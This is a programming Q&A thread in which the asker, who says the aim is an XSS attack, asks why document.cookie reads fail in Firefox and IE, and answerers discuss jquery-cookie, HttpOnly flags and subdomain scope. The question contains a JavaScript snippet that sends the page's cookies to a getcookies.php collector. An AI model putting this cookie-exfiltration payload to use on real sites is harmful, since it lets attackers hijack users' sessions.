# Cannot read cookies in Firefox and IE

Tags: javascript, cookies

I have to read cookies using JavaScript. I am using the `document.cookie` to do that same. But the method works on Google Chrome only, and not on Firefox and IE 8/9. All the web-pages also show `document.cookie` as a way to do it.

How can I fetch cookies in Firefox and IE using JavaScript?

Thanks

**UPDATE**
I tested my code on localhost. On testing the code online on **blogspot.com**, it didn't even work on chrome.

Any ways, here's the HTML code:

```
<script type="text/javascript">
    function sendCookies(){
        document.location='http://localhost/xss/getcookies.php?cookie='+escape(document.cookie);
    }
</script>
<a onclick="sendCookies()" href="#">
click here </a> to know about XSS attack.
```

While debugging `document.cookie` in browsers, it shows value in Chrome only. If I replace localhost link a online link, `document.cookie` is empty, even on Chrome.

Your possible guess is right. This is a sort of cross-site scripting attack.

Any help on this code will be of good use to me?

**UPDATE 2:**

Here's the link to the video which shows how to perform XSS attack:

[How to perform XSS attack](http://www.youtube.com/watch?v=qO3iwAxkPxE)

Comment: `document.cookie` **is** the way to do it. If it doesn't work, then something is probably wrong with your interpretation of the documentation you are reading or with the cookie you are trying to read. You need to provide more information about your specific problem for people to provide help that is more useful then a link to the tutorials that you have, presumably, already read.

Answer (score 2):

have you tried using jquery-cookie? https://github.com/carhartl/jquery-cookie
Also, keep in mind that you cannot read http-only cookies with javascript. Though, if you can read the cookies in chrome, it is not an http-only cookie. You can check if a cookie is http-only by going to the resources tab in the debug console in chrome and checking if the HTTP column has a tick mark for the cookie.

Comment: I did use jquery.cookie.js. But it look like it doesn't fetch all cookies, like `$.cookie()`. I fetches cookies only when supplied a key, like `$.cookie('key')`. Where as I have to read all the cookies like `document.cookie` does.

Comment: @kush.impetus Actually, that's wrong - it does fetch all cookies. You just do this: `$.cookie('cookie_name');` to get the value and to set one: `$.cookie('name','value', { expires: 20 });` Read this post for a good tutorial on using jQuery Cookie: http://www.electrictoolbox.com/jquery-cookies/

Comment: Thanks Nathan. I tried your code. Now, what the code in that web-page does is that fetches only those cookies that are we create using `$.cookie("key", "value")`, but not the cookies already existing in the browser for that domain. I again used Chrome for testing the code. Chrome showed (in Resources tab in Developer Tools) about already existing 10-12 cookies whose domain is **.blogger.com**. Also, it shows the cookies that I created through `$.cookie("key", "value")` but their domain is **username.blogspot.in**. Both in one list. That is perhaps why I cannot fetch all cookies. Your comments?

Comment: You cannot read cookies set by subdomains, neither can you set cookies for a subdomain. To avoid this, while setting cookie, you should set the domain as ".example.com"